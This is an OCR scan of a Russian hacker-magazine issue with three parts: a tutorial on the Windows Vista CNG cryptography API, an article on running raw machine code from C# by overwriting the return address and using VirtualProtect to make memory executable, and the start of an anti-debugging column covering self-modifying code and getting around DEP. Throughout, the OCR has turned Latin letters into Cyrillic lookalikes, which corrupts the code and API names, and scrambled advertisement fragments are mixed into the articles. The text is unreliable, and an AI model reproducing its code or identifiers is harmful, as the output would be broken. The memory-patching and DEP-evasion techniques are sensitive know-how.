Перечень изменений в криптографической системе выглядит следующим 
образом: 
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Криптографические примитивы СЫ6 



•Введен новыйуровеньабстракции, реализованный через 
СЫО. 

•САРІ сменил свою версию на 2.0 (при этом САР1 1 .0 никуда не 
исчез, поддержка его функций сохранена в полном объеме). 
•.Ыеі: Ргатеѵѵогк теперь имеет в своем составе все необхо- 
димые интерфейсы, обеспечивающие взаимодействие СІ_В с 
криптографической подсистемой. 

Согласись, перемены достаточно серьезные. И это я еще 
не упомянул о кардинальной перестройке архитектуры 
интерфейса РКІ. Следуя известной мудрости, гласящей о 
том, что «нельзя объять необъятное», давай остановимся на 
центральной теме нововведений в криптосистеме — на ин- 
терфейсе СЫ6, а все остальное пусть будеттвоим домашним 
заданием :). 

Итак, технология СЫ6 (Сгуріодгарбу Ыехі; бепегабоп) пришла 
к нам всерьез и надолго, будучи призванной заменить 
устаревший СгуріюАРІ. Основной логической единицей как 
в СгурІоАРІ, так и в СЫ6 является криптопримитив, то есть 
некоторая сущность, обеспечивающая выполнение одной 
специализированной операции. Если провести сравнение 
криптопримитивов, входящих в состав СгурІоАРІ и СЫ6, то 
можно сказать, что СЫО в полном объеме включает в себя 
СгуріюАРІ плюс новые дополнительные возможности. На 
рисунке, иллюстрирующем структуру СЫ6, видно, что основу 
технологии составляют два элемента — N Сгурі; и ВСгурб 
ЫСгурІ отвечаетза хранение ключей, используемых асси- 
метричными алгоритмами шифрования. Крометого, N С гурі 
обеспечивает поддержку смарт-карт и прочего оборудо- 
вания. А вот функции ВС гурЕ гораздо шире и интереснее. 
Именно здесь находится все богатство криптографических 
примитивов, которыми располагает СЫО. Эти примитивы 
могутбыть использованы какв режиме ядра, таки в поль- 
зовательском режиме, вто время какхранилище ключей 
N С гурі: доступ но только из пользовательского режима. 

СЫО предоставляет специальный АРІ для доступа к криптогра- 



фическим возможностям ѴѴіпсіоѵѵб Ѵізіа. Причем реализован 
этот доступ, в отличие от других аналогичных систем, не в виде 
отдельных функций, а в виде набора интерфейсов криптоядра. 
Набор логических криптоинтерфейсов представляет собой 
криптомаршрутизатор. Посмотри на схему структуры СЫ6, 
чтобы получить представление отом, какие криптопримитивы 
втвоем распоряжении. Ну как, впечатляет? 

Допустим, ты решил написать супербезопасную программу, 
предназначенную для работы подѴѴіпсіоѵѵб Ѵізіа. Как при этом 
получить доступ к криптографическим примитивам? Слушай 
сюда, и будет тебе счастье. 

Есть универсальный интерфейс СЫ6, который называется 
провайдером алгоритмов (Аідогібип Ргоѵібег). Для обра- 
щения к провайдеру алгоритмов существует дескриптор 
ВСПУРТ_НАЫ01_Е. Инициализация провайдера алгоритмов не 
представляет ничего сложного: 

ВСКУРТ_НАШЬЕ аІдогіДЬшРгоѵійег = 0; 

ЫТ5ТАТОЗ збабиз = 

: : ВСгурбОрепАІдогібЬтРгоѵісІег ( 

&а1догібЬгпРгоѵі(іег , аІдогібЪггШате , 
ішріетепбабіоп, біадз) ; 
іб (ЫТ_51ГССЕ55 (збабиз) ) 

{ 

// Используем СЫО-примитивы 

} 







> ІП^О 

По некоторым 
сведениям, в 5Р1 
для ѴѴѴ помимо всего 
прочего войдут и 
изменения СЫѲ, 
в частности, будут 
добавлены такие 
алгоритмы, как алго- 
ритм симметричного 
дополнительного 
шифрования и алго- 
ритм двойной эллип- 
тической генерации 
случайных чисел. 



За управление инициализацией провайдера алгоритмов 
отвечает строка «ВСПѴРТ_НАЫОІ_Е аІдогі1:ЬтРгоѵіс1ег = агд», 
где агд — это как раз и есть параметр, управляющий процес- 
сом инициализации. В частности, если он равен нулю, то по 
умолчанию будет использован криптоалгоритм, определяе- 
мый параметром аІдогібзтМате. 

Можно еще долго разглагольствовать на тему управления 
памятью. Но это было бы уместно в «Мурзилке» или «Веселых 
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► 113 





Подключение библиотекСЫѲ 5БК 



Подключение С N6 5БК к проекту 




Специально для 
тебя мы выложили 
на наш диск СЫѲ 
5БК! Шифруйся на 
здоровье. 

Лучше один раз 
увидеть, чем бла- 
бла-бла... Забирай 
с диска архив с при- 
мерами, распаковы- 
вай и изучай. 




> Ііпкз 

Ьир://гП5СІп2. 
тісгозой.сот/еп- 
ц5/ИЬгагу/аа376214. 
азрх — подробное 
описание СМС на 
сайте М5БЫ. 

ѵѵѵѵѵѵ.тісгозоЛ.сот/ 
зесигііѵ/діоззагу. 
тзрх — словарь 
терминов по ІТ-безо- 
пасности, использу- 
емых в технологиях 
компании МісгозоЛ. 



картинках», но никакие в журнале, который читаюттакие 
реальные перцы, какты и наш редактор Александр Лозовский 
(хе-хе, отлично я придумал, грубая лесть в адрес читателей и 
редактора всегда благотворно сказывается на тиражах и раз- 
мере гонорара). Поэтому я просто ограничусь примером, иллю- 
стрирующим механизм завершения работы с провайдером: 

збабиз = : : ВСгурбСІозеАІдогібЪтРгоѵісІег ( 
аІдогібЪтРгоѵісІег , біадз) ; 

АЗЗЕКТ (ЫТ_ЗІІССЕЗЗ ( збабиз ) ) ; 

То есть мы передаем функции ВСгурбСІозеАІдогібЬтРгоѵісІегП 
ранее созданный дескриптор провайдера алгоритмов и забы- 
ваем о том, что у нас вообще когда-то был такой объект. 

Если ты будешь использовать СЫС не в своих домаш- 
них поделках или на уроках труда в средней школе, а в 
серьезном приложении, тогда и в процесс создания, и 
в процесс уничтожения экземпляра провайдера крайне 
необходимо добавить обработчик ошибок, реагирующий 
на сигналы ЫТ_51)ССЕ55. 

0 СЫО НА ПРАКТИКЕ 

Прежде всего, если ты собрался использовать в своем 
проекте возможности СЫ6, не забудь о заголовочном 
файле <ЬсгурбЬ>, а также укажи линкеру, что при сборке 
проекта понадобится библиотека ЬсгурбсШ. Большин- 
ство функций, входящих в СЫ6, может генерировать 
различные сообщения о текущем статусе. Для этого 
используется файл пбзбабиз.б, следовательно, если тебе 
понадобится обработка этих сообщений, используй вот 
такой макрос: 



#ібпйеЕ ШШЗБССЕЗЗ 

Мебіпе ЫТ_ЗІК:СЕЗЗ (Збабиз) 

( ( (ЫТЗТАТОЗ) (Збабиз) ) >= 0) 

#еп(ііЕ 

Шифруем данные: 

ВСгурбОрепАІдогібЬтРгоѵісіег (&1іАІд , . . . ) 
ВСгурбСебРгорегбу (ЬАІд , ВСКУРТ_ВЬОСК_ 

ЬЕЖлГН , &с}ѵ'7ВІоскЗІ2е , . . . ) 

ВСгурбСеб Ргорег бу (ЪАІд , ВСВУРТ_ОВаЕСТ_ЬЕШТН , 
&сЬКеуОЬ^ есбЬеп, . . . ) 

ВСгурбСепегабеЗуішпебгісКеу (ІтАІд, &ЫСеу , . . . ) 
ВСгурбЕпсгурб (ЬКеу , . . . ) 

ВСгурбБезбгоуКеу (ЬКеу ) 
ВСгурбСІозеАІдогібЪтРгоѵісІег (ЬАІд, 0 ) 

Не все понятно?0к. Давай разбираться, что тут написано. Пер- 
вая строка подключаети инициализируетпровайдера крипто- 
алгоритмов. Дальше с помощью функции ВСгур1:0ебРгорегбу() 
мы выделяем в буфере место под размещение кодируемых 
данных и ключа, которым будет осуществляться шифрование. 
После того как мы позаботимся о выделении памяти, можно 
приступать непосредственно к шифрованию. Оно выполня- 
ется в два этапа: сначала генерируем ключ симметричного 
шифрования — ВСгурб6епегабе5уттебгісКеу(), затем шифру- 
ем данные — ВСгурбЕпсгурб). И не забываем убирать за собой 
— ВСгурЮезбгоуКеуО, ВСгурбСІозеАІдогібЬтРгоѵісІегІ). Навер- 
няка, у кого-то из гиков, привыкших кжесткому порно, точнее, 
кжесткой оптимизации (вроде того нарисованного хрена, 
который считает себя другом второго нарисованного хрена, 



Основные функции СІМСг, 
доступные разработчикам: 

• новая система конфигурации криптографических 
параметров; 

•хранилище ключей шифрования, независимое от исполь- 
зуемых алгоритмов; 

• механизм изоляции процессов, использующих ключи 
шифрования; 

• новый алгоритм генерации случайных чисел; 

• возможность выбора используемого алгоритма цифровой 
подписи; 

• криптографический АРІ уровня ядра. 



В общем случае технология 
использования С1\ГС включает 
в себя пять шагов: 

1 . Открываем соединение с провайдером 
криптоалгоритмов . 

2. Получаем или устанавливаем параметры алгоритма. 

3. Создаем или импортируем ключ шифрования. 

4. Осуществляем кодирование с помощью выбранного 
алгоритма. 

5. Закрываем соединение с провайдером 
криптоалгоритмов. 



► іі4 
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Приложение 




Крипто А ЙІ 



Сп&цинльнсе предложение. 






Прй&ій$ѵр 

КриПРЮ 

сервисов 



ТЕПРЙПН ИНТЕРНЕТ 

ЕЛЬЧ^ЦП поеклочение ье спп аі но 



* ПОД НЛМ^^ІЧ И* - 9 ЛЮ&ОІ* МОСТе 

Мог к пы и восковок о и обп. 



более интеллигентного вида), возник вполне резонный вопрос: по- 
чему мы пошли в обход, использовав ВСгурЮрепАІдогіІбтРгоѵібег 
вместо обращения непосредственно кфункциям шифрования? 

Все дело в том, что обращение к кэшируемому объекту гораздо 
эффективнее, чем непосредственный вызов функций шифрования. 
Кстати, подобный подход использовался и раньше, например при 
обращении кфункциям САРІ. 

Также просто с помощью СЫ6 можно получить и хэш-функцию 
объекта: 



* Срок подключами* в — 1 4 дней, 

Ь Московской йбл. - от 14 да 30 Дней. 

« Ѵстлноскл прямого мррі;чЕис.когт) Г* Г в Фо много помора 

■ ІЛ ког □ к диіл ь м ыв и'лсфвиныс номера 



ВСгурСОрепАІдогіСЬтРгоѵісІег (&ЬА1д , . . . ) 
ВСгурРСеЕРгорегСу (ЬАІд, ВСРУРТ_ОВаЕСТ_ 
ЬЕШТН , &сЪНазЬ , . . . ) 

ВСгурЬСгеаСеНазЬ (ЬАІд , &ЬНазЬ, . . . ) 
ВСгурЬНазЬБаЬа (ЬНазЬ, . . . ) 
ВСгурЦРіпізЬНазЬ (ЬНазЬ, . . . ) 
ВСгурЬБезЕгоуНазЬ (ЬНазЬ) 
ВСгурЬСІозеАІдогіЦЬтРгоѵісіег (ЬАІд , 0 ) 



» 1 Р- те- де Фомин 
» 0ц ДШ Л и М Н МО линии Потерло г 
* Кйрпеддтианые частные е*іи С V Р N 5 



По аналогии с предыдущим примером перво-наперво необхо- 
димо позаботиться о выделении адресного пространства для 
работы с объектами. За работу с хэш-функциями отвечают методы 
ВСгурЮгеаіеНазЫ), ВСгуріНазЬОаЫ) и ВСгуріРіпізбРІазЫ). Ну 
и, какобычно, завершаем все уничтожением ненужных более 
объектов и ссылок: ВСгурЮезІгоуРІазЫ) и ВСгурЮІозеАІдогНЬтРг 
оѵібегО. 

Идем дальше. Еслиты не знаешь, что такое МАО, — бегом учить 
матчасть. И не спеши возмущенно заявлять, что о Месііа Ассезз 
Сопігоі знают даже первоклассники. МАО — это еще и Меззаде 
АиіЬепШсабоп Собе, то есть одна из реализаций технологии циф- 
ровой подписи. Создание МАО аналогично расчету хэш-функции, 
за исключением двух моментов. Во-первых, при вызове ВСгурЮреп 
АІдогііЬтРгоѵісІег последним из передаваемых функции парамет- 
ров должен быть ВСРУТР_А1_6_НАЫ01_Е_НМАС_Р1_А6. Во-вторых, 



■ Хостинг услуги йШв-цвнтра 
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п к.гіткі.ігі ■-лініі ІгкІчаШ і т!.ги ;4»І| >НВ-І 34 2 





ЧМІ-Ѵ 



ДѴ15ТА 



Алгоритм 


#0ЕРШЕ 


Стандарт 


РС2 


ВСРѴРТ_РС2_АІ_60РІТНМ 


РРС2288 


РС4 


ВСРѴРТ_РС4_АІ_60РІТНМ 


- 


АЕ5 


ВСРѴРТ_АЕ5_АЬ60РІТНМ 


РІР5197 


РЕ5 


ВСРѴРТОЕЗАЬбОРІТНМ 


РІР5 46-3, РІР5 81 


йЕЗХ 


ВСРѴРТ_ЗОЕ5_АЬеОРІТНМ 


- 


ЗйЕЗ 


ВСРУРТ_0Е5Х_АІ_60РІТНМ 


РІР5 46-3, РІР5 81, 5Р800-38А 


ЗОЕ5-112 


ВСВУРТ_30Е5_112_АІ_60РІТНМ 


РІР5 46-3, РІР5 81 , 5Р800-38А 


Мй2 


ВСРУРТМ02АІ.60ВІТНМ 


РРС1319 


Мй4 


ВСРУРТ_М04_АІ_60РІТНМ 


РРС1320 


Мй5 


ВСРУРТ_М05_АЬ60Р1ТНМ 


РС 132 


5НА-1 


ВСРУРТ5НА1АІ.60РІТНМ 


РІР5 180-2, РІР5 198 


5НА-256 


ВСРѴРТ_5НА256_АІ_60РІТНМ РІР5 


180-2, РІР5 198 


5НА-384 


ВСРУРТ_5НА384_АІ_СОРІТНМ 


РІР5 180-2, РІР5 198 


5НА-512 


ВСРУРТ5НА512АІ.60РІТНМ 


РІР5 180-2, РІР5 198 


Р5А (шифрование) 


ВСРУРТРЗААЬбОРІТНМ 


РКС5#1 ѵ1.5амоѵ2.0. 


Р5А (подпись) 


ВСВУРТ_В5А_5І6І\І_АІ_еОВІТНМ 


РКС5#1 ѵ1.5амоѵ2.0. 


Алгоритм Дифи-Хелмана 


всрурт_он_Аьеорітнм 


РКС5#3 


Алгоритм цифровой подписи 


ВСРУРТ_05А_АІ_60РІТНМ 


РІР5 186-2 



Криптографические алгоритмы, реализованные в СЫ6 



дополнительно нужно указать секретный МАС-ключ и его размер. Таким 
образом, вызов функции будет похож на тот, что приведен ниже: 

ВСКУРТ_АЬС_НАЖ)ЬЕ ЪАІд = ШЬЬ; 

ЫТЗТАТІІЗ зЪаЫіз = ЗТАТиЗ_ШЗІІССЕЗЗЕиЬ; 

збаііиз = ВСгурЬОрепАІдогіЫшіРгоѵісіег (&ЬА1д, 
СебРгебеггедНшасАІд ( ) , 

ШЬЬ, 

ВСВУРТ_АЬС_НАМБЬЕ_НМАС_РЬАС ) ) ) 

Но известная фирма на букву М не была бы сама собой, если бы все было 
прозрачно, ясно и понятно. Видишьфункцию 6е[Рге[еггес1НтасА1д()?Так 
вот эта функция не является частью библиотеки СЫ6, как логично было бы 
предположить. Ее реализация отдается на откуп программисту, который сам 
должен решить, в соответствии с каким алгоритмом будет рассчитываться 
МАО. Аты какхотел: понавызывал кучуАРІ-функций и айда на печку смета- 
ну есть? Нет, иногда еще и думать приходится. Такие вот дела, брат. 



Система безопасности ѴѴіпсІоѵѵх ѴізСа 
основана на следующих элементах: 

• Контроль пользовательских учетных записей 

• Подсистема контрактов и сертификатов 

• Контроль целостности программного кода 

• Шифрование данных 

• Изоляция приложений 

• Переадресация данных 

• Криптография 

• Защита системных сервисов 
•ѴѴіпсІоѵѵз Бе&тіег 

• Система управления правами и привилегиями 



Ну и, наконец, такая полезная возможность, предоставляемая СЫ6, как ге- 
нерация случайных чисел. С этой задачей справится даже стая леммингов, 
добравшаяся до клавиатуры: 

ВСКУРТ_АЬС_НАШЬЕ ЪКпдАІд = ШЬЬ; 

іі (ВСгурЬОрепАІдогіЫшіРгоѵідег (&Ь.РпдА1д, 
ВСРУРТ_ЕКС_АЬСОКІТНМ , 

ШЬЬ, 

0) == ЗТАТІІЗ.ЗІІССЕЗЗ) { 

ВУТЕ Ьиб [32] ; 

і 1 ( ВСгурІсСепКапсЗот ( ЪВпдАІд , 

Ьиб , 

зігеоб (Ьиб ) , 

0) == ЗТАТІІЗ_ЗІГС:СЕЗЗ) { 

} 

ВСгурЬСІозеАІдогіІіЬшРгоѵісЗег (ЪВпдАІд , 0 ) ; 

ЪКпдАІд = ШЬЬ; 

} 

Полный список функций СЫбАРІты можешь найти в документации, которой 
комплектуется СЫО 50К, или же на сайте М50Ы. Крометого, на диске, идущем 
в комплекте с журналом, мы выложили подборку примеров использования 
СЫб.Такчто, если какие-то моменты тебе не особо понятны, смотри исходники. 
И несколько слов о собственно использовании СЫѲ. Прежде всего, 
это технология, тесно завязанная на криптофункциях Висты. Следова- 
тельно, не рассчитывай на то, что тебе удастся по юзать С N6, к примеру, 
в ѴѴіпсІоѵѵз ХР. Для разработки приложений, использующих новые 
криптографические возможности, понадобится Ѵізиаі Віисііо 2005 с 
первым сервис-паком (естественно, бета-версия Ѵ5 2008, которая 
выкладывалась на диске к августовскому номеру журнала, тоже подой- 
дет). Я тут уже упоминал, что СЫ6 совместима только с ѴѴѴ. А это значит, 
что помимо ЮЕ нам понадобится еще и ѴѴіпсІоѵѵз Ѵізіа 50К, позволя- 
ющий разрабатывать приложения для этой операционной системы. 

И, наконец, самое главное, без чего тебе не обойтись, — это СЫ6 50К, 
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Архитектура СЫ6 



содержащий все необходимые заголовочные файлы, библиотеки и 
криптоинструменты. Где его взять? Ну, во-первых, на сайте производи- 
теля (хм... почему-то это слово у меня ассоциируется исключительно с 
мужской особью крупного рогатого скота]. А во-вторых, на нашем диске 
— такие вот мы добрые и щедрые. 



И последнее замечание. Еслиты фанат Ѵізиаі Вазіс’а или крутой перец, не 
признающий ничего, кромежутко модного С#, спешутебя огорчить: СЫ6 
ЗОКсовместимтолько с проектами, неписанными на приплюснутом Си. 
Теперь детали... 

Для того чтобы начать работать с СЫО, нужно в свойствах проекта в группе 
параметров С/С++ (строка АсИіІіопаІ Іпсіисіе Оігесіогіез) прописать путь к 
файлам СЫ6 5йК. Если ты не менял предложенный по умолчанию каталог 
установки 50К, тогда это будет С А Р год га т РіІез\МісгозоЙ СЫ6 Оеѵеіортепі: 
КіЛіпсІисІе. 

Кроме того, в свойствах линкера необходимо указать, где он сможет найти 
необходимые ОІ_І_-файлы (СДРгодгат РіІез\М іеговой СЫѲ Оеѵеіортепі: 
КіШЬ\Х86). 

^ КРИПТОГРАФИЯ НОВОГО ПОКОЛЕНИЯ 

Как видишь, парни из МісгозоЙ действительно приложили немалоусилий 
ктому, чтобы заменить малопопулярный у разработчиков САРІ более 
надежным и более функциональным набором инструментов. И этоу них, 
безусловно, получилось. Хотя, возможно, они немного погорячились, 
назвав это криптографией нового поколения, поскольку ничего принципи- 
ально нового придумано не было. Просто широко известные и проверенные 
временем алгоритмы были объединены в криптоядро со своим АРІ, доступ- 
ным как из пользовательского режима, так и из режима ядра. Простая идея. 
Но, несмотря на свою простоту, она позволяет вывести криптографические 
возможности операционной системы на новый уровень. Считать ли это 
криптографией нового поколения, решать тебе. Асііоз! □с 
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НИЗКОУРОВНЕВЫЙ 



хакеро<ииподхо/Гюзаемассемб^ 



Как известно, ассемблеру предрекали полное и безоговорочное забвение еще в старо- 
давние времена, когда появился С++, поразивший программистов своей ООП-архи- 
тектурой. Всего несколько лет назад вышли платформа .N61: Ргатеѵѵогк и язык програм- 
мирования С#. Казалось бы, низкоуровневому программированию в таких условиях 
существовать просто не суждено. Однако и сегодня встречаются задачи, для решения 
которых нужно приносить жертвы древнему богу программирования, имя которому 
— АззетЫег. Остатки старой элиты срр’шников приводят массу аргументов против С#, 
и первым в списке называемых ими недостатков обычно выступает тот факт, что С# не 
поддерживает ассемблер. Но есть одно но. Дело в том, что мы с тобой совершенно с этим 
не согласны! Есть у русских тайные погреба, и вам их не засыпать! Способ юзать ассемб- 
лер в сишарповых прогах у нас тоже есть, и рассказывать мы о нем будем, комментируя 
код во врезке, поэтому срочно посмотри на нее, испей бутылочку темного пива и приго- 
товь свой разум к восприятию нижеследующего текста. 



начале обрати внимание, что наши классы содержат флаг 
ипза^е. Этот флаг необходим при использовании указателей 
С#. Для того чтобы они работали, нужно изменить свойства 
проекта, установив опцию «Ргорегбез -> Виііб -> АІІоѵѵ ипзаію 
собе». Наша программа-консоль начинается со строки 3, где мы вызываем 
универсальную функцию СаІІАззеппЫег, в которую передается ссылка на 
массив байт, содержащий машинные команды процессора. Универсаль- 
ность этой функции заключается в том, что она одинаково подходит для 
любого вызываемого кода. В начале этой функции (строка 22) идет, каза- 
лосьбы, совершенно бесполезная (а на самом деле имеющая ключевое 
значение) операция — объявление переменной типа іпТ Когда мы объяв- 
ляем эту переменную, она ложится в стек на самый низ выделенного для 
функции фрейма. Исходя из этого, мы можем узнать адрес верхушки стека, 
подсмотрев в отладчике, по какому смещению находится эта переменная 
относительно верхушки фрейма. 



Для того что бы посмотреть на выполнение программы в ассемблере, нужно 
зайти в меню «ОеЬид ѴѴіпбоѵѵз ОІБаззетЫу». Здесь мы можем наблю- 
дать инициализацию этой переменной: «бѵѵогб ріг [еЬр-40Ь] ,4». Из кода 
видно, что переменная инициализируется по смещению 0x40, представляя 
собой важную константу, которую мы используем в строке 24. Получив ука- 
затель на переменную I (строка 23), мы меняем его так, чтобы он указывал 
на обратный адрес (как известно, для команды геіон нужен, поскольку авто- 
матически записывается при вызове функций командой саЩ. 

Так вот этот самый адрес находится выше адреса фрейма стека вызванной 
функции на четыре байта. И вычисляем мы его в строке 24, используя дан- 
ную константу. В строке 26 мы рассчитываем адрес первого байта массива 
азт (машинных команд), которые мы должны запустить, а в строке 28 — пе- 
резаписываем обратный адрес функции СаІІАзБетЫег на адрес первого 
байта массива азт. Таким образом, когда работа функции СаІІАБзетЫег 
закончится и будет вызвана команда геі, управление передастся нашему 
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машинному коду. А какже вернуть управление вызывающему коду? Об этом 
должен позаботиться код, на который мы передали управление. Я сделал 
просто «тоѵбѵѵогсі рІг[езр], еах», перезаписав обратный адрес на значение 
из еах, поскольку СаІІАззетЫег возвращаетобратный адрес, а перед выхо- 
дом из СаІІАззетЫегон записывается в еах. 

В принципе мы могли бы на этом остановиться, но лично мне не нравятся 
все эти вызовы СаІІАззетЫег каждый раз, когда необходимо выполнить 
азт-код. Поэтому далее мы поступим хитро, изменив команду саіі, которая 
вызвала СаІІАззетЫег, в результате чего вызываться теперьбудеттолько код 
из массива азт. Для этого мы модифицируем адресный операнд команды саіі. 
Вот пример бинарного представления команды саіі: Е8 ЗР 1 0 44 79. Она состоит 
из пяти байт. Первый байт (Е8) указывает процессорутип команды, а другие 
четыре байта — это и есть адрес, который необходимо поменять. Адрес этого 
операнда мы узнаем в строке 29 — он равен адресу геі минус четыре байта. 

Да, кстати. Перед модификацией мы должны сделать несколько шаманских 
действий. Дело втом, что мы не можем просто так менять код в памяти, ведь 
страницы памяти, содержащей код, имеют атрибут РА6Е_ЕХЕС1)ТЕ_НЕА0. 
Этот атрибут формально запрещает изменения кода, но обычно отэтой 
великой майкрософтовской защиты бываетмало пользы. Крометого, в .Ыеі 
массивы располагаются на страницах памяти, которые содержат атрибут 
РА6Е_ПЕА0ѴѴВІТЕ. Другими словами, выполнение кода в массиве запре- 
щено, поэтому мы, используя АРІ ѴігІиаІРгоІесІ, выставим необходимые 
атрибуты РА6Е_ЕХЕСІЛЕ_РЕАВѴѴВІТЕ. Теперь можно спокойно изменять 
код в памяти (строка 33) и делать выход из СаІІАззетЫег. 

В одной из программ я использовал этот метод, чтобы сортировать большой 
массив ипісоб-строк методом шелла. Такое решение работало в 15-18 раз 
быстрее стандартной сортировки Аггау.БогІ. 

г массивы 

Для того чтобы ты ощутил всю полноту низкоуровневого программиро- 
вания, я расскажу о структуре массивов в .ЫеТ В общем случае массивы 
имеют следующий формат: по смещению 0 находится четырехбайтный 
ТуреНапсІІе, указывающий натип элементов массива. По смещению4 
— длина массива. Далее идут его элементы. Ниже представлены функции 
для изменениятипа массива и изменения размера массива: 

ипзаЕе сіазв АггауЦЬіІіДу 

{ 

риЫіс зСаЫс ѵоісі СііапдеТуре (Аггау аг. Туре пемТуре) 

{ 

иіі. * рСг = (иіпС*)МагзЬа1 .ШзаЕеАйЫОЕРіппесІАггауЕІ 
ешепД(аг, 0 ) . ТоРоіпДег ( ) ; 
рбг -= 2; 

*рбг = (иіпЬ) пемТуре .ТуреНапсІІе .Ѵаіие . ТоІпДЗ 2 () ; 

} 

риЫіс зСаЫс ѵоісі КезігеШзабе (Аггау аг, 
иіпС пеѵ/Зіге) 



Нашы сорцы 

ипзаіе сіазз ЕезЕ { 

зЕаЫс ѵоісі Маіп ( зЕгіпд [ ] агдз) { 

іпі: Ъ = АзшНеІрег .СаІІАззетЫег (азш) ; 

Сопзоіе .МгіііеЬіпе (Ъ) ; 

Сопзоіе . КеаЬЬіпе ( ) ; 

} 

зСаЫс ЪуДе [ ] азт = пеѵ? ЬуЕе [ ] { 

0x89, 0x04, 0x24, // тоѵ ЬтлгогЬ рСг [езр] , еах 

0хВ8 , 0x77, 0x07, 0, 0, // тоѵ еах, 777іі 
ОхСЗ // геС 

} ; 

} 

ипзаіе риЫіс зСаЫс сіазз АзшНеІрег 
{ 

риЫіс зЕаСіс іпД СаІІАззетЫег (ЬуЕе [ ] азт) { 
іпС Ь = 4; 
іпС* р = &Е; 
р += 0x40 /4 + 1; 

1: = *р; 

Еіхесі (ЪуЬе* Ь - &азт[0] ) 

{ 

*р = ( іпі: ) Ь ; 

іпС* р2 = (іпС*)пе\л? ІпДРСг 
( * (р — 1 ) ) . ТоРоіпДег ( ) ; 
иіпі Іазб = 0; 

Ьооі Еіид = ѴігДиаІРгоЕесі: (р2 — 1, 32, 

0x40 , &1азЕ ) ; 

Еіид = ѴігДиаІРгоЕесЕ ( 

( іпі * ) пем ІпСРі:г(Ъ) . ТоРоіпДег ( ) , 

32 , 0x40 , &1азД) ; 

*р2 = ( іпі:) (Ъ + 3) ; 

} 

геЕигп *р; 

} 

[БШтрогЬ ( "кегпе132 . (311 " ) ] 

збаСіс ехДегп Ьооі ѴігСиаІРгоЕесі: ( іпС* ІрАсЗсЗгезз, 
иіпі: сЬ/Зіге, иіпі: ЕІИеиРгоДесі: , 
иіпі:* ІрТІОІсЗРгоДесЕ) ; 

} 



{ 

иіпі* рДг = (иіпі* ) МагзЬаІ . ІІпзаЕеАсЗЬгОЕРіппесіАггауЕІ 
етепі: ( аг , 0 ) . ТоРоіпДег ( ) ; 

*--рі:г = пеиЗіге; 

} 

} 

Функция СбапдеТуре позволяет быстро получать различные представле- 
ния одних итехже данных. Если скорость ее работы сравнивать с классом 
Сопѵегі.то она будет выше на несколько порядков. Крометого, Сопѵегі в 
процессе преобразования создаетновый массив, таким образом затрачи- 
вая дополнительную память. 

0 ВЗАКЛЮЧЕНИЕ 

Честно признаться, ассемблер мало используется в прикладных програм- 
мах. Но ведь когда-то же он требуется? :) Я надеюсь, что эта статья поможет 
тем, кто ищет, а также даст возможность приверженцам срр и азт стать 
сторонниками сз и азт. □с 
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Трюки 
от крыса 



В ПРОШЛОМ ВЫПУСКЕ МЫ ГОВОРИЛИ о 
ТОМ, КАКУПРОСИТЬ ОТЛАДКУ. СЕГОДНЯ 
МЫ ЗАЙМЕМСЯ ОБРАТНОЙ ЗАДАЧЕЙ, 
СОСРЕДОТОЧИВ СВОЕ ВНИМАНИЕ НА 
АНТИОТЛАДОЧНЫХ ПРИЕМАХ, ПРЕПЯТ- 
СТВУЮЩИХ ВЗЛОМУ ПРОГРАММ. СРАЗУ 
ЖЕ ПРЕДУПРЕЖУ, ВСЕ ОНИ СИСТЕМ- 
НО-ЗАВИСИМЫ И ВЫХОДЯТ ЗА РАМКИ 



КЛАССИЧЕСКОГО СИ, А ПОТОМУ ПРИМЕ- 
НЯТЬ ИХ ИЛИ НЕ ПРИМЕНЯТЬ -СУПЕР- 
НЕОДНОЗНАЧНЫЙ ВОПРОС. НО ЕСЛИ ТЫ 
ВСЕ ЖЕ НАДУМАЕШЬ ИХ ПРИМЕНЯТЬ, 
ЭТА СТАТЬЯ НАУЧИТ ТЕБЯ ЭТО ДЕЛАТЬ 
ПРАВИЛЬНО. 



► 120 



показана. Функция Рэо просто возвращает адрес своего начала. Адрес конца 
определяется аналогичным образом. 



ДОСТОВЕРНОЕ ОПРЕДЕЛЕНИЕ АДРЕСА НАЧАЛА ФУНКЦИИ 

сіесізрес (пакесі) 

боо ( іпб х) 



саіі ххх ; заталкиваем в стек адрес ххх 
ххх : 

рор еах ; адрес ххх -> ЕАХ 
зиЬ еах, 5 ; отнимаем длину САЬЬ 



гебп 



; возвращаем адрес функции в регистре ЕАХ 



Для обхода аппаратного йЕР (по умолчанию задействованного только для 
системных приложений) необходимо выделить блок памяти функцией 
ѴігШаІАІІос с флагами РА6Е_ЕХЕСІ)ТЕ_ВЕА0ѴѴВІТЕ ил и же изменить атри- 
буты уже выделенного блока вызовом ѴігІиаІРго^есЕ 



самомодифілцирующийся код 

I Упрощенная стратегия создания самомодифицирующегося кода 
выглядит приблизительно так: 1) получаем указатель на подопытную функ- 
цию; 2) вычисляем размер функции, вычитая из указателя на следующую 
функцию указатель на подопытную, надеясь, что компилятор расположит 
функции в памяти в порядке их объявления; 3) выделяем блок памяти в 
стеке или куче; 4 ) копируем туда подопытную функцию; 5 ) издеваемся над 
ней, какзаблагорассудится, например расшифровываем налету. 

Так или примернотакпоступаюттысячи программистов, удивляющихся, по- 
чему программа падаетпри изменении ключей компиляции. Аона и должна 
падать! Формально языкСи позволяет получать указатель на функцию, 
но оставляет компилятору большую свободу, и во многих случаях вместо 
указателя на функцию мы получаем указатель на переходник к ней вида 6МР 
[МЕМ]. 

Существуеттолько один надежный способ достоверно определить адрес и 
размер функции — спросить об этом у нее самой! Идея заключается в сле- 
дующем: при передаче «магических» аргументов функция либо возвращает 
адрес своего начала/конца и тут же завершается, либо самостоятельно 
копирует себя в обозначенную локацию. 

Для нейтрализации возможных побочных эффектов следует использовать 
квалификатор пакеб, поддерживаемый М5 ѴС, при котором компилятор не 
вставляет в функцию никакой отсебятины и даже пролог, эпилоги инст- 
рукцию возврата мы должны точить самостоятельно. Простейший вариант 
реализации приведен ниже. Обработка аргументов для упрощения не 






функции, которые не возвращают управление 

Ничто не раздражаетхакеров так, как функции, не возвраща- 
ющие управления. При трассировке типа 5Еер Оѵег (то есть без захода 
в функции) отладчик какбы проваливается внутрь очередного САЕЕа, 
теряя управление над отлаживаемой программой. И чем чаще это про- 
исходит, тем больше матерится хакер. Конечно, пошаговая трассировка 
(5іер Іпіо) отрабатывает нормально, но это такой геморрой! От взлома не 
остановит, но по крайней мере доставит психологическое удовлетворе- 
ние о того, что мы нагадили хакеру. Мелочь, а приятно! 

Кажется, что для решения поставленной задачи идеальным образом 
подходит пресловутый оператор доіо, но он действуеттолько в пределах 
одной функции, а за ее пределы вылетать обламывается. Это связано с 
